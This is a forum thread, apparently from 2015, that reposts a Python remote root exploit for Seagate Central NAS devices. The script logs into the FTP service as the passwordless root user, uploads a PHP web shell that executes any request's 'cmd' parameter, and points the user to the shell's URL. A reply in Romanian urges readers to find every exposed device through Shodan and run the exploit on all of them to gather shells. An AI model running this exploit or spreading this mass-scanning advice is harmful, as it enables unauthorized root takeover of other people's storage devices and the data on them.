KhiZaRix Posted June 5, 2015 Report Share Posted June 5, 2015 #!/usr/bin/python# seagate_ftp_remote_root.py## Seagate Central Remote Root Exploit## Jeremy Brown [jbrown3264/gmail]# May 2015## -Synopsis-## Seagate Central by default has a passwordless root account (and no option to change it).# One way to exploit this is to log into it's ftp server and upload a php shell to the webroot.# From there, we can execute commands with root privileges as lighttpd is also running as root.## -Fixes-## Seagate scheduled it's updates to go live on April 28th, 2015.## Tested Firmware Version: 2014.0410.0026-F#import sysfrom ftplib import FTPport = 21php_shell = """<?phpif(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST["cmd"]); echo "<pre>$cmd</pre>"; system($cmd);}?>"""php_shell_filename = "shell.php"seagate_central_webroot = "/cirrus/"def main(): if(len(sys.argv) < 2): print("Usage: %s <host>" % sys.argv[0]) return host = sys.argv[1] try: with open(php_shell_filename, 'w') as file: file.write(php_shell) except Exception as error: print("Error: %s" % error); return try: ftp = FTP(host) ftp.login("root") ftp.storbinary("STOR " + seagate_central_webroot + php_shell_filename, open(php_shell_filename, 'rb')) ftp.close() except Exception as error: print("Error: %s" % error); return print("Now surf on over to http://%s%s%s for the php root shell" % (host, seagate_central_webroot, php_shell_filename)) returnif __name__ == "__main__": main()Sursa > https://dl.packetstormsecurity.net/1506-exploits/seagate_ftp_remote_root.py.txt Quote Link to comment Share on other sites More sharing options...
socket Posted June 7, 2015 Report Share Posted June 7, 2015 Intra pe shodan.io scrie "Seagate Central" si incearca exploitul asta pe toate si ti-ai facut rost de shelluri. Quote Link to comment Share on other sites More sharing options...